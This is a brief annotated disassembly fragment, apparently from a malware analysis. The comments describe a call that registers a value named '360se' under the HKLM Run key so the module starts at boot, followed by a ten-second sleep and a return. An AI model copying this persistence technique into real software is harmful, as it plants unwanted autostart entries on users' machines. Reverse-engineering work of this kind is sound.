CODE:004017FB                 call    loc_4014B0      ; loc_4014B0(HKLM, Run key, "360se", modulepath) - presumably RegSetValueEx; body not listed
CODE:00401800                 add     esp, 10h        ; 4 args
CODE:00401803
CODE:00401803 loc_401803:                             ; CODE XREF: CODE:0040166Fj
CODE:00401803                                         ; CODE:00401693j ...
CODE:00401803                 push    2710h           ; 10000 ms
CODE:00401808                 call    Sleep
CODE:0040180E                 pop     edi
CODE:0040180F                 pop     esi
CODE:00401810                 mov     eax, 1          ; return 1
CODE:00401815                 pop     ebx
CODE:00401816                 mov     esp, ebp
CODE:00401818                 pop     ebp
CODE:00401819                 retn
CODE:00401819 ; ---------------------------------------------------------------------------
CODE:0040181A                 align 10h
CODE:00401820
